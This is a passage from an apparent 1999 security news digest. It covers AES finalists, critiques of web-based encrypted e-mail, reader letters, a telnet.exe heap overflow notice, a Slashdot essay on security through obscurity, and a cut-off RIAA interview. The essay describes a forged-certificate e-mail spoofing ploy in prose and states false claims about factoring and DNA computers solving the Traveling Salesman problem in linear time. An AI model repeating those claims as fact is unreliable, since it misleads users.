http://officeupdate.microsoft.com/Articles/mdac_typ.htm


The Ontario Information and Privacy Commissioner has published a pamphlet
that recommends that anyone using e-mail learn to understand and use
encryption.
http://www.ipc.on.ca/Web_site.ups/MATTERS/SUM_PAP/PAPERS/encrypt.htm


And one last Microsoft item. To help salvage their reputation, Microsoft
put a server running a beta of Windows 2000 outside its firewall and dared
hackers to break in. The problem was that the server couldn't stay up long
enough for anyone to even try.
http://www.zdnet.com/zdnn/stories/news/0,4586,2309474,00.html?chkpt=hpqs014
http://www.windows2000test.com/



** *** ***** ******* *********** *************


Counterpane Systems News




Counterpane Systems has changed its name to Counterpane Internet Security,
Inc. We have received venture-capital funding from Accel Partners and
Bessemer Ventures, and are in the process of creating a series of service
offerings in the managed security area. Anyone interested in working for
Counterpane in the Bay Area should contact me immediately. Watch this
space for more details. This is going to be the coolest security company
you've ever seen.


PasswordSafe wins PC Magazine editors choice award:
http://www.zdnet.com/pcmag/stories/reviews/0,6755,2311193,00.html


Bruce Schneier profiled on guru.com:
http://www.guru.com/profiles_schneier.html


Microsoft PPTP's vulnerability discussed:
http://www.zdnet.com/sr/stories/news/0,4538,2293711,00.html


Bruce Schneier will be speaking at the Scandinavian Network Expo, in the
evening on 14 September and then on 15 September
http://www.networkstelecom.com/index_eng.html
http://www.firedoor.se/bruce/bruce.var



** *** ***** ******* *********** *************


NIST AES News




AES is the Advanced Encryption Standard, the encryption algorithm that will
eventually replace DES. In 1997, the U.S. government (NIST, actually),
solicited candidate algorithms for this standard. By June 1998 (the
submission deadline), NIST received fifteen submissions. NIST asked for
comments on these algorithms, with the intention of pruning the list to
five finalists. NIST held an AES conference in Rome in April (this was the
second AES conference, the first was the previous August in California),
the comment deadline was in June, and last Monday NIST announced the finalists.


They are:


Mars, submitted by a large team at IBM.
RC6, from RSA Data Security (including Ron Rivest)
Rijndael, from a team of excellent Belgian cryptographers
Serpent, by three very respected cryptographers, Ross Anderson,
Eli Biham, and Lars Knudsen
Twofish, from Counterpane Systems, including myself


NIST didn't just announce the five finalists. They published a 52-page
report explaining their rationale -- why they chose the algorithms they did
and why they did not chose the algorithms they didn't -- and it is worth
reading to peek at their decision process. It's at
http://csrc.nist.gov/encryption/aes/round2/round2.htm#NIST


The next step is to choose among the finalists. NIST is again soliciting
comments on the algorithms, and there will be a third AES Candidate
Conference in New York in April 2000, held in conjunction with the 7th Fast
Software Encryption workshop. Comments are due by 15 May 2000, and then
NIST will propose a standard. The AES will then go through the formal
government approvals process and become a Federal Information Processing
Standard (FIPS), and presumably will become the standard encryption
algorithm for all sorts of international applications. Expect all this to
happen by the summer of 2001; the government moves slowly.


Cryptographers are busily analyzing the submissions for security. It's
tempting to think of the process as a big demolition derby: everyone
submits their algorithms and then attacks all the others...the last one
standing wins. Really, it won't be like that.


At the end of the analysis period, I don't expect serious weaknesses to be
found in any of the finalists. The winner will be chosen based on other
factors: performance, flexibility, suitability.


This means that we need your input into this process. I know you're not
cryptographers, and you won't be able to comment on the mathematics of the
various submissions. But you can comment on your encryption requirements,
and whether the algorithms will suit your needs.


AES will have to work in a variety of current and future applications,
doing all sorts of different encryption tasks: 32-bit microprocessors,
64-bit microprocessors, small 8-bit smart cards, DSPs, FPGAs, custom ASICs,
and everything else we can't even imagine yet.


Choosing a single algorithm for all these applications is not easy, but
that's what we have to do. It might make more sense to have a family of
algorithms, each tuned to a particular application, but there will be only
one AES. And when AES becomes a standard, customers will want their
encryption products to be "buzzword compliant." They'll demand it in
hardware, in desktop computer software, on smart cards, in
electronic-commerce terminals, and other places we never thought it would
be used. Anything we pick for AES has to work in all those applications.


So how do you comment? NIST is accepting formal comments either on paper
or by email. See http://www.nist.gov/aes for instructions. Be sure to
identify who you represent and what cryptography interests you have.
Remember, AES is going to be your cryptography standard for the 21st
century. We need your help.


NIST Round 2 page:
http://csrc.nist.gov/encryption/aes/round2/round2.htm


FSE 2000:
http://www.counterpane.com/fse.html


Performance comparison of AES candidates:
http://www.counterpane.com/aes-performance.html


A version of this essay appears at:
http://www.zdnet.com/zdtv/cybercrime/features/story/0,3700,2312895,00.html



** *** ***** ******* *********** *************


The Doghouse: HPUX and the UNIX Crypt Algorithm




Here is a comparison of the Solaris and HPUX man pages for the UNIX "crypt"
encryption function. Same algorithm, different interpretations, different
conclusion.


According to the Solaris 2.6 Crypt man page, "crypt implements a one-rotor
machine designed along the lines of the German Enigma, but with a
256-element rotor. Methods of attack on such machines are widely known,
thus crypt provides minimal security."


According to the HPUX10.20 man page, "crypt implements a one-rotor machine
designed along the lines of the German Enigma, but with a 256-element
rotor. Methods of attack on such machines are known, but not widely;
moreover the amount of work required is likely to be large."


Reading the HPUX man page, you get the impression that crypt offers
adequate protection for your files. It is a sad statement when
cryptographic algorithms that are broken as homework for cryptography
students are put forward as a means to protect data by a mainstream OS vendor.



** *** ***** ******* *********** *************


Web-Based Encrypted E-Mail




The idea is enticing. Just as you can log onto Hotmail with your browser
to send and receive e-mail, there are Web sites you can log on to to send
and receive encrypted e-mail. HushMail, ZipLip, YNN-mail, ZixMail. No
software to download and install...it just works.


But how well?


HushMail <http://www.hushmail.com> is basically a PGP or S/MIME-like e-mail
application that uses Java (although oddly enough, HushMail is not
compatible with either). The sender logs onto the HushMail Web site, and
encrypts messages using a Java applet that is automatically downloaded onto
his machine. Both the sender and receiver need to have HushMail accounts
for this to work. Accounts can be anonymous.


The algorithms are 1024-bit ElGamal for key exchange and signatures, and
Blowfish for bulk encryption. But everyone's private key is stored on the
HushMail server, protected in a passphrase. This means that one weak link
is likely to be the passphrase; it's the only protection you have against
someone who has legal or illegal access to the HushMail server. (The
current beta -- August 99 -- doesn't let you change your passphrase,
although they promise the feature in the future.)


Another weak link is the Java applet. When you download it, you have no
idea if it is the correct applet. Yes, the source code is public, but that
doesn't help when you are at a public Internet terminal trying to encrypt
or decrypt private e-mail. A Trojaned Java applet can do all sorts of
damage, and there is no way to know. Sure, you use an SSL connection
between your computer and the HushMail server, but if you don't actually
check the details of the received certificate, you have no idea who you are
connected to. HushMail is considering writing something to verify the
applet automatically, but then how do you trust the verifier?


This is actually a major problem. The applet can be signed, but who signed
it? Even if you check the certificate, the typical browser permits a dozen
different PKI roots by default, and any one of them can issue a forged
certificate. This means you have to trust them all. And you have to trust
that a Trojan didn't drop a phony certificate into your browser. Note that
a downloaded verifier can never solve this problem; it just turns the "how
do I trust the applet" question into "how do I trust the verifier."


And a third possible weakness is the location of the HushMail servers.
Although the company is based in Antigua, the servers are located in
Canada. Presumably Canada is more susceptible to legal attacks. And
remember that the security depends on the physical protection of the
HushMail server.


All in all, though, HushMail seems like a reasonable implementation of the
idea. The company seems clued; they have a reasonably informative Web
site, and respond promptly to security questions.


ZipLip <http://www.ziplip.com> is different. Both parties do not need an
account to communicate. The sender logs onto the ZipLip Web site and,
using SSL, sends a message to someone else. ZipLip then sends the
recipient a message telling him that your message is waiting. The
recipient then logs onto ZipLip to receive the message. Encryption,
outside the two SSL connections, is completely optional.


ZipLip won't identify the encryption algorithm used, which is enough to
discount them without further analysis. But they do something even
stupider; they allow the sender to create an encryption key and then give
the recipient a "hint" so that he can guess it. ZipLip's own Web site
suggests: "The name of the project we're working on," or "The restaurant
where we had dinner last night." Maybe there are 100,000 restaurants, so
that's a 17-bit key.


The threats here are serious. Both the sender and receiver need to verify
their SSL connections, otherwise there is no security. The ZipLip server
is a major attack target, both because many messages will not be encrypted,
and because those that are will have keys weakened by the requirement that
both parties remember them.


On the plus side, ZipLip claims a policy of deleting all mail 24 hours
after delivery, which provides a level of lawyer-proofing that HushMail
does not have...if they implement it properly.


YNN-mail <http://www.ynnmail.com> is barely worth this paragraph. They
encrypt stored messages with a 40-bit key, and don't use SSL when you sign
up and send them a long-term password. Snake-oil if I've ever seen it.


And I just heard of another, ZixMail <http://www.zixmail.com/>. I didn't
have time to examine it in depth, but the FAQ -- look at their wishy-washy
comments on encryption -- makes it sound like real snake oil, too.


Web-based encrypted e-mail is less secure than PGP-encrypted e-mail (or
S/MIME e-mail) for a few reasons. One, the constant interaction between
the communicants and the server leaves more opportunity for
man-in-the-middle attacks, Trojan horses, etc. Two, SSL-based
authentication is more vulnerable to spoofing, since almost no one ever
bothers to check the details of received certificates and there is no
revocation mechanism in place. And three, there are some very attractive
attack targets: servers with large collections of secret e-mail and
potential decryption keys. Certainly Web-based encrypted e-mail is better
than unencrypted e-mail, but I'd stick with PGP or S/MIME if possible.



This essay was written with input from Fred Wamsley.


A version of this essay appears at:
http://www.zdnet.com/zdnn/stories/comment/0,5859,2314064,00.html



** *** ***** ******* *********** *************


Comments from Readers




From: "Couvares, Peter F." <peter.couvares@tdstelecom.com>
Subject: Crypto-Hacking


For all it's worth, it looks like you were beaten to the punch -- I can
find at least four prior uses of "crypto-hacking" or "cryptohacking".


Google turned up the following, among others:


http://cc2.gamestats.com/wwwboard/messages/894.html
http://www.hotwired.com/talk/club/special/transcripts/96-03-13.levy.html


All of them seem to use it to mean hacking a system that employs
cryptography rather than hacking cryptography itself, however -- your
definition is a more useful contribution to the vocabulary.



From: John Savard
Subject: Cluelessness Alert. I'm not so sure.


I certainly do agree that the military can safely allow public information
to be stored on Web sites on commercial hosts. However, I have noted that
a lot of military sites are actually on U.S. Government-owned machines in
the .mil domain.


And it is difficult, particularly using common commercially-available
operating systems and Internet hosting software, to maintain the kind of
impregnable security needed for any system that also contains sensitive
information.


There are ways of making an Internet server essentially immune to most
kinds of hacking. Macintosh servers, not having a CLI, appear to be quite
secure. But there are other techniques, most of which require custom
software and even custom hardware.


For example, to take an idea from the telephone company, how about a
computer with two CPUs. CPU number 1 is connected to the hard drive
containing the software for the computer, and has read-write access to all
of RAM. CPU number 2 is the one connected to the network. It has
read-only access to the chunk of memory from which it runs programs. But
it has read-write memory for storing data, and read-only access to a hard
drive containing the Web site it is to present to the Internet. If it also
has data to store, it gets write access to a hard drive for that purpose.
The access is determined by *hardwired connections*, not by operating
system privileges which can be subverted.


In most operating systems, either the Microsoft ones or the Unix clones,
networking is part of the operating system, and the TCP/IP connection to
the Internet is part of that network. It has to be explicitly limited in
its privileges, and if someone gets Administrator privileges/root access,
that can be overturned. That shouldn't happen, but any bug in the OS is a
possible back door.


Now, suppose instead that the OS didn't even HAVE networking in it. The
port connected to the Internet was something the OS didn't even know about,
and everything that port did was under the control of one unprivileged
*applications program*. Even if the OS didn't even have security -- say it
was MS-DOS -- with precautions against such attacks as buffer overrun, an
applications program with narrowly focussed capabilities could be quite secure.


If one doesn't go to these kinds of lengths, though, while it is true that
constant vigilance and the use of more conventional security methods (i.e.
firewalls) can give "pretty good" security, I think the Pentagon is
entirely justified in taking the attitude that the kind of *ironclad*
security they need just isn't available if one connects to the Internet.
I'm quite sure that the NSA or whoever could come up with a
"super-firewall" that could act as a public Web-site host, and yet be
updated from within a highly sensitive computer network, with safety. But
it would take technologies like the two-CPU sketch above, which just aren't
available off the shelf. And it's off-the-shelf technologies that have
been used for much of the military's Internet presence.


So while it is true there is a way for the military to stay on-line and
maintain security, it is also true that that is not immediately available.
Taking some Web sites off-line until the vulnerabilities can be remedied
isn't a silly policy, even if there may be some individual examples of
cluelessness where sites involving no exposure are taken down.



From: dragon@revealed.net
Subject: Re: Major cluelessness alert


I just read your blurb on the Army's consideration of pulling off of the
net, and I felt I had to comment. In particular, I disagree with the page
which you felt had "a good analysis of this idiotic idea".


While I agree that a simple knee-jerk reaction to shut off the Internet
connection just because X company did so is not prudent, I do believe that,
in an organization with an educated security staff, there is a place for a
temporary shut-down of the connection. In particular, I was involved in
making this decision for one of the companies I work with, and we were
concerned with two points: 1) since Melissa was propagating via e-mail with
little human intervention, we decided to cut off access until we had gotten
enough control on our internal population to not propagate to our business
partners in the way that other large companies had done to us, and 2) to
give our admins the breathing room to be able to rationally understand what
the impact on our production systems were and to implement the
updates/fixes that were coming to us from our suppliers.


I don't know how anyone can say that it's idiotic to disconnect from the
Internet when in the face of an attack which is both significant in scope
and relatively unknown in implementation. Yes, it could be considered to
be paranoid, xenophobic, and reactionary, and it's true that it is not
necessarily any safer to be connected on any other day, but to deny a
security staff the ability to raise the drawbridge until the immediate
threat is at least understood hoodwinks us to the point that we won't
really be able to function.


Finally, I have to say that I agree with at least a part of the military's
decision to pull back. The one thing that they mentioned was that they
were attempting to correct the positioning of sensitive data. There is a
lot of information, military or otherwise, that has no place on the public
Internet. The running joke in our department is that the only secure
computer is one that is powered off, melted into slag, encased in concrete,
and buried at the bottom of the ocean. Your own writings show that not
even cryptography is completely reliable due to advances in mathematics and
side-channel attacks. There are many, many circumstances where the
sensitivity and criticality of data demands location on a network that is
air-gap protected from others, whether those other networks are the public
Internet, less-secure Intranets, or private WANs connecting to suppliers
and dealers. The real idiocy is placing data which needs to be kept secure
on machines which are accessible via public, or near-public, channels.



From: Jon Williams <dragon@revealed.net>
Subject: Cracking Encrypted ZIP files


Regarding encrypted ZIP file cracking:


While brute forcing the password may work most of the time for most people
and take less time, there is also a known-plaintext attack, which only
requires 13 known bytes. Check out
http://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html for a whitepaper
describing the attack and working software. I've successfully used this.



From: "David Brownell" <david-b@pacbell.net>
Subject: SSL at Wells Fargo


Wells Fargo's on-line banking site is still using SSL v2 ... doesn't
support browsers configured to use more secure versions (v3, TLS) and has
even rejected SSL v2 connections that don't use RC2 (deprecated). I'm sure
you understand the SSLv2/RC2 issues, even when 128-bit keys are in use;
they're just not as strong as other protocols/ciphers, at least for the
front-door sorts of attacks that were NOT your point.


The "simple" bungle on their site, however, is that if you've adopted a
policy that you're not going to use SSLv2 for "secure" transactions, the
Wells Fargo site says to you that your browser isn't secure enough, and you
need to get a 128-bit browser. Doesn't say "you must enable an obsolescent
version with a dubious cipher" ... which it could say, very easily. It
says something completely wrong.


That was a useful collection of basic bungles. Don't forget the other
type, using an HTTPS page that's got sensitive data in query params for its
URL, and an http://... link that'll cause that sensitive data to be logged
in what are usually insecure logfiles. (No current examples handy -- but
if you see one of those, it's classic!)



From: David Crick <dacrick@cwcom.net>
Subject: SSL at BT


British Telecom (BT) are another company with worrying views on Internet
security. You'd think with their image and standing that they could do better.


Their e-services Web page [www.bthome.com/e_services/index_sh.html] allows
home users to check and amend various account details and services.


But despite the spread of strong crypto Web-browsers [www.opera.com] and
security upgrades for IE, Windows and Netscape [www.replay.com], BT only
chose to use 40-bit SSL.


This is accompanied by the following endorsement and warning:


"When ordering goods and services make sure the Web site you are using uses
a 'Secure Socket Layer (SSL)' session. The BT Shop - At Home uses such
sessions from the moment you start to place an order."


Also: "If you are still uneasy about using the Web to order on-line then
you should use an alternative method of ordering."


Hardly inspiring, is it?


It also makes one dubious about their "Secure Site Programme":


"Trustwise Secure Sites use a BT Secure Server certificate to establish
proof of identity of the owner of the Web site and enable secure
communication between the Web site and visitors to that site.


"BT carefully checks the identity of the organization that owns the Web
site and verifies that the Web site is registered to that organization.


The BT Trustwise Secure Site Programme allows you to learn more about the
Web sites you visit before you submit any sensitive or confidential
information."


Again, I could only find 40-bit SSL in operation, despite the "Trustwise"
logo [e.g. see http://www.bt.com/Talk/].



From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Subject: AES


NIST has just announced that the finalists in the Advanced Encryption
Standard competition are MARS, RC6, Rijndael, Serpent and Twofish. That
makes three U.S. algorithms, one Belgian, and one which I developed in
collaboration with colleagues in Israel and Norway.


It may be of interest that, under the export controls on intangibles which
England's DTI pushed in their recent White Paper and which they are now
trying to have adopted as an EU regulation, I would have needed a personal
export licence from the DTI in order to do this work.


It seems somewhat unlikely that a licence would have been granted. Arms
exporters complain to me that DTI officials are notorious for blocking
licences to punish them for such 'offences' as complaining about the
licensing process. So perhaps I would have not done the work; perhaps I'd
have defied the law and now be involved in a huge test case in the European
Court; perhaps I'd have emigrated; perhaps we'd just not do research in
collaboration with foreigners. Who knows?



** *** ***** ******* *********** *************


CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.


To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.


Please feel free to forward CRYPTO-GRAM to colleagues and friends who will
find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as
it is reprinted in its entirety.


CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of
Counterpane Internet Security Inc., the author of "Applied Cryptography,"
and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served
on the board of the International Association for Cryptologic Research,
EPIC, and VTW. He is a frequent writer and lecturer on cryptography.


Counterpane Internet Security, Inc. is a venture-funded company bringing
innovative managed security solutions to the enterprise.


http://www.counterpane.com/


Copyright (c) 1999 by Bruce Schneier


ISN is sponsored by Security-Focus.COM

@HWA

10.0 TELNET.EXE HEAP OVERFLOW
~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Tuesday 17th August 1999 on 10:51 pm CET
Jeremy Kothe reported to BugTraq about Heap Overflow in windows 98 Telnet.exe.
"This version of Telnet (77824 bytes, 11th May 98) has a bug which allows a heap
overrun. It assumes that the first command-line argument will be <255 chars when
preparing for the "Connect Failed" message-box. The result is that a few crucial bytes
can be written over, which, as the telnet app is closing, allow full execution of
arbitrary code". Read the details here. Valentin Perelogin also posted that
Windows'95 telnet.exe (74,720Kb) is also exploitable.

@HWA

11.0 SECURITY THROUGH OBSCURITY VS FULL DISCLOSURE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 17th August 1999 on 9:30 pm CET
This Slashdot feature deals with two views on security, security through obscurity,
which relies on the ignorance of attackers rather than the strength of defenders and
the opposing full disclosure approach. This paper suggests security through obscurity
can and does work in certain strictly limited ways, and should not be eliminated
unthinkingly from the admin's arsenal. It further implies that the boundaries between
STO and 'real' security are blurry and deserve evaluation. Interesting reading to say
the least. Complete story

http://slashdot.org/features/99/08/17/1327246.shtml

Obscurity as Security

Posted by CmdrTaco on Tuesday August 17, @10:00AM EDT
from the saaay-wait-a-minute dept.
Matthew Priestley has taken a break from slaving for the man to write us a piece where he takes on the
convential wisdom that Security through Obscurity isn't secure at all, and tries to argue that sometimes it
is. The following was written by Slashdot Reader Matthew Priestley

Disclaimer: The author of this paper works for Microsoft, but his opinions may not be those of Microsoft. In
fact, they aren't. The author hereby declares that nobody important is even aware of his existence and that
the closest he has ever come to plotting with Bill Gates on the Master Plan was when they used adjacent
urinals this one time. The author did not peek.

0 Introduction

With the popularity of the open-source mindset, a general contempt has drizzled upon all forms of obscurity. The
concept of security through obscurity (STO) in particu lar has been decimated. Security through obscurity, which
relies on the ignorance of attackers rather than the strength of defenders, is dead in all but practic e. The victory of the
opposing full disclosure approach is so complete that proposed ta ctics die at the mere hint they are a form of STO.

This paper suggests security through obscurity can and does work in certain strictly limited ways, and should not be
eliminated unthinkingly from the admin's arsenal. It further implies that the boundaries between STO and 'real' security
are blurry and deserve evaluation. However, this paper in no way proposes obscurity as a method for keeping
secrets in the long term.

1 Full disclosure does not apply to instantiated data

Instantiated data - the data used by specific instances of an algorithm - do not fall within the scope of full disclosure.
Were this not so, then even the simplest password would violate the ban on security through obscurity. Passwords
are secrets known only to their creators, and password entry is commonly obscured, as in the case of the 'shadow'
login of UNIX. While the login protocol may be open, passwords themselves are a form of STO, with obscurity
localized in the password string.

Instantiated data are exempt from full disclosure because the risk from their failure is limited. When a script cracks a
password, the damage done to the secure system extends only as far as that password's scope. The cracker cannot
use the compromised string to gain power directly in another system, even if that system runs the same password
protocol. Nor can anything be inferred about the value of one password merely from the value of another with equal
or lower permissions.

A similar example of instantiated data obscurity is the private key that forms the basis of asymmetric cryptography.
So obscure is this information that it is rare for even the owner to be familiar with its precise value. But such obscurity
is a necessary element of modern security schemes. Strong security does not eliminate obscurity - rather, it localizes
obscurity to instantiated data. The phrase in cryptology, 'carry all security in the key' might be better phrased 'carry all
obscurity in the key'.

2 Full disclosure does not apply to time-limited secrets

Secrets that expire after a short lifetime can be protected by a wider array of techniques than long-standing secrets.
The defense of information that will be irrelevant in a matter of hours or days may not warrant fully peer-reviewed
security. Consider the famous Navajo code-talkers of World War II. Among the Americans coordinating the at tack
against Japanese-held islands in the Pacific were a number of Navajo Indians, who spoke a slangy version of the
complex Navajo tongue. Commands from HQ were issued through these code-talkers, who encrypted and
decrypted with an alacrity that belittled the automated methods of the day. This is an excellent example of time-limited
security through obscurity. Secret languages are excellent security in the short-term, but however cryptic Navajo may
be, it is a code subject to human betrayal. Use of Navajo against the Japanese much beyond the 3-year window of
the war would have been unwise. But because the secrets of American strategy in the Pacific were irrelevant after the
conclusion of the fighting, the long-term weakness of obscure Navajo as a security measure was unimportant.

3 Obscurity serves as a tripwire

Perhaps the classic example of wrongheaded STO is the administrator who modifies his web server to listen on a
nonstandard port - thereby confusing attackers, as the theory goes. Considering the degree to which tasks such as
port scanning can be automated, the naivete of this defense seems plain. The cracker might be forced to check all
64512 unreserved ports, but eventually the concealed web server will be found. This appears to be a weakness of
STO, but if manipulated correctly, it is in fact a great strength. Imagine that our same admin had also invoked a
tripwire script and set it to listen on one or more unused ports. When the tripwire is probed with a SYN packet from
a cracker trying to locate the web server, instantly the system goes to full alert. The packet is logged and the admin's
pager sounds like an alarm.

Such tripwire approaches work because they do not expect obscurity to keep information hidden. Rather, they
obscure information as a ploy to force invaders into showing their hand. Because the obscured implementation differs
on each system, crackers must resort to guess-check scanning before attacks can commence. But tripwires are
deployed throughout the system, anticipating this very move. Running an automated kit suddenly becomes a risky
proposition, and even talented crackers must gamble on, for example, whether 'root' is really the name of the primary
account or merely a hotline to the authorities.

Lighthearted implementations of this approach are a staple in the popular "Indiana Jones" films. In one scene, Jones is
confronted with a hallway of lettered tiles, all seemingly alike. To cross safely he must step only on those tiles with
letters corresponding to the secret word 'Jehovah'. The penalty for a misstep is to crash through the floor and
plummet into a gaping pit. Attackers not privy to the password would find an exhaustive search less than optimal in
this case. When traps are mingled with genuine data, STO can be a powerful disincentive. Such measures do not
make a given machine resistant to breach in the long term, any more than medieval moats could ultimately protect
their castles. But like moats, tripwire obscurity provides a critical buffer against attackers, allowing defenders room to
breathe.

4 Asymmetric cryptography exhibits traits of STO

Despite the notion that asymmetric cryptography such as RSA is 'real' security, in some aspects these methods
resemble STO. Indeed, this entire class of cryptography is founded on the hopeful guess that a certain mathematical
problem is intractable. The back door into cryptographic methods that rely on multiplying primes is, quite simply, to
develop a swift means of factoring those multiples. This NP-time problem must be solved before a private key can b
e derived from its corresponding public key, and the notorious difficulty of NP problems leads some supporters to
characterize asymmetric cryptography as 'prova bly secure'. This is far from the case - there is uncertainty among
mathematicia ns as to whether this problem will even prove non-trivial once approached from t he right angle.
Startling progress has been made in solving similar 'impossible' problems using innovative ploys - for example, DNA
computers can now solve the Traveling Salesman problem in linear time. Given that asymmetric encryption is used
widely in the world's e-commerce infrastructure, the repercussions when this piece of obscurity is cracked are
disturbing to contemplate.

One telling argument against STO is that it promotes a false sense of security, leading admins into complacency. But
the complexity of asymmetric cryptography, combined with reports of its infallibility, can produce much the same
effect. Co nsider this social-engineering exploit of digital signing. Using a tool such as m akecert, the cracker
generates a root certificate with the name 'Verisign Class 1 Primary CA' and uses it to sign an end-entity certificate
with the subject 'CN=Rob Malda, E=malda@slashdot.org' (CT:Please don't. I'm used to posers pretending to be me
in Quake, but not on email ;) The cracker then sends the email to an enemy, using a client that does not validate
e-mail addresses and spoofing the return address friendly name. The inexpert recipient, thinking all is in order and
knowing that digital signatures never lie, trusts the root certificate and hence forth carries on a conversation with a
false CmdrTaco. Only scrutiny of the headers will reveal the mail is actually going to a different address. The widely
made claim that public-key cryptography is 'real' security and completely unrelated to 'false' STO delivers a more
powerful illusion of security than anything an XOR'd password file can provide.

Even brute-force cryptanalysis has parallels in STO. Suppose we wish to conceal the passwords for a number of
Swedish bank accounts. We resolve to write them to a secret location on our hard drive, perhaps a few unused bytes
in a file sector. Only we, who know the lucky offset, can read the data. This form of concealment is a typical case of
secruity through obscurity. The integrity of our secret depends on the ignorance of the cracker, and a trial of all 2^n
possible locatio ns compromises the system. But in what way is this fundamentally different from the 'genuine' security
of n-bit encryption? To break this form of security, 2^n keys are generated and tried agains t the cipher text until the
result is a plain body. Is the difference between this 'true' security and the 'false' STO merely than n is considerably
larger in encryption than in the case of hard drives? But this implies that our real error lay, not in reliance upon
obscurity, but in having a hard drive of insufficient size!

5 Conclusions

Security in the absence of obscurity is not strictly possible, but good systems both localize and advertise their points
of obscurity. When the admin is fully a ware of the obscurity in a system, tripwires and instantiated data can provide a
useful complement to more rigorous security techniques. Obscurity cannot keep information safe or concealed for
long, but it can make attacks risky and destroy the effectiveness of automatic kits. These benefits should not be
dismissed as an article of faith.


@HWA

12.0 THE MUSIC INDUSTRIES' "CYBER-SHERRIF"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 17th August 1999 on 9:00 pm CET
The growing number illegal MP3 copies of copyrighted songs that are distributed
across the Net is becoming an increasingly big problem for the music industry. Here's
an interview with RIAA Executive Director Hilary Rosen on this matter. Read the
interview below

http://www.businessweek.com/bwdaily/dnflash/aug1999/nf90817b.htm

Music and the Net: A Chat with the Industry's Cyber Sheriff
RIAA Executive Director Hilary Rosen sings a tune you might not expect

"When the music's over, turn out the lights" crooned the Doors' Jim Morrison some 30 years ago. Today, the
dirge is a fitting take on how Net pioneers regard the lumbering record industry, which they almost giddily
hope will be toppled by the Web's ability to sort and transmit digital music for sale online. In recent months, the
industry's vulnerability has been underscored by the stunning growth of MP3 files -- many of which are record
companies' own copyrighted songs uploaded sub rosa onto illegal trading posts.

The record companies have a sheriff, of course. She's Hilary Rosen, long-time executive director of the
47-year-old Recording Industry Association of America. While the industry undergoes painful, and sometimes
enlightening change, it's Rosen's responsibility to keep order. The hastily formed Secure Digital Music
Initiative, for instance, is an effort by the major record and technology companies to stop illegal duplication of
copyrighted material. Beyond this squabbling over standards, Rosen must also help record companies confront
a larger question: Will they even matter 20 years from now? Looking for answers, Business Week staff editor
Dennis Berman chatted with Rosen recently. Here's an edited transcript of their conversation:

Q: How would you describe the state of mind of a big chunk of your consumers, namely young
people who are growing up on the Internet, where so many of the products and services are free?
A: I don't think the concept of music being free is new. I think the shift is how
consumer expectations of getting products through the Internet has built up as
a free activity. But I actually don't think it's as big a problem as some people
might expect me to think. We know consumers want music. And we know
they want it online, and I'm grateful to the MP3 phenomenon for showing the
music community just how badly [consumers] do want it.

They're willing to spend all that time and energy to download in the most
difficult, complex, time-consuming, incompatible ways. I mean, have you downloaded MP3 files? It's a pain.
It's not really easy. It's hard to choose the thing, you don't really get the sample. It's not easy.

So if they're willing to go through that much trouble to get music, I'm completely convinced that if an artist
offers them a fresh version of the highest sound quality with the lyrics packaged, then consumers want to pay
for that. It will be easy, it will be compatible.

Q: What business lessons do you think record companies -- habitually criticized as being slow and
lumbering and profiteering -- have learned from the Internet?
A: I think No. 1 would be that record companies were traditionally forced into the box of seeing the retailer as
their customer, because the retailers bought the records and then sold them to the consumer. Whereas, the
Internet has given both the record companies and the artists a direct relationship with their fans. That's
probably the most significant thing.

We have a small member company label called Astralwerks. It's a great label, great energy. Their relationship
with the Chemical Brothers [a techno group] is so intense that they now have their marketing plan for the new
Chemical Brothers release suggested to them by the fans whom they have Web relationships with.

Gimmick, yes, but extraordinarily appealing. [Now] people communicate
with you about real research, not just a bunch of guys in gray suits telling you
what they perceive their phone bankers have learned -- but real research.
So, I think that's No. 1 -- that it is fundamentally changing the relationships
that exist between the music consumer and the providers of the music.

I think one other thing, and that is the sort of value equation about music use. It used to be that there was one
business model, they sold records. So, all of their investment and marketing or promotion and tour support,
and whatever they did with an artist, had to be made up in a record sale. With the Web, you have the
opportunity for a real variety of business models, driven by the consumer. That means you don't have to make
a million dollars selling the whole album.

If you make $100,000 here selling the album, and $100,000 dollars in licensing fees for a track on an online
jukebox, and then another $100,000 doing your licensing for a Webcast, then the multiple revenue streams
really allow you to take a lot more risks -- on music that might not otherwise be as profitable, and that you
wouldn't, therefore, take the risk on.

Q: What do you worry most about?
A: I think it's interesting how labels can sustain major artists' increasing desires -- and deserved desires -- for
more and more money, with limited capitalization in some of the more entrenched companies. And I guess it's
sort of how do you get the infusion of cash that you need, and then, what do you do with that cash?

Q: How do you feel about losing the suit against Diamond Multimedia [the first company to develop
a mobile player for MP3 files. The RIAA sued Diamond, claiming that its technology allowed for
illegal use of copyrighted material.]
A: Somebody asked me if we'd bring the Diamond suit again. As recently as 18 months ago when this suit was
brought, the whole world was different.

Q: How was it different?
A: The technology industry didn't come to the table with any level of understanding for the creative community
-- that the products were being considered as ways to exploit the music, not expand it. At the time, it was the
best judgment call that was made, that we could make.

Q: So, you regret it now?
A: No. What I regret is that it sends a signal about our attitude, which I think is incorrect. It was never the
strategy, it was just a part of the strategy. Concepts like SDMI and bringing people together has always been
the strategy. And the RIAA, unfortunately, jumped out of the box there.

Q: One thing that seems to be missing is artists' involvement. Artists saying, "Hey, you know, we
put out this music that means so much in your life, we deserve to be paid for it. We certainly don't
deserve to be ripped off." Why don't we see more artists making those statements?
A: I think artists don't like to be perceived as getting into controversy -- they're about their music, they're
about their relationships with their fans. I think that given the way that this was positioned in the press over the
last two years -- artists vs. fans, artists vs. record companies -- anytime somebody said something, they were
taking sides. I think that has been tough.

But I will tell you, I get calls from artists and managers every day asking us to
take stuff off a Web site. If artists were every day telling me, "You know, we
don't believe in what you're doing, we think this should all be free. We don't
care about our stuff being protected," I'd go find another job. They don't, as
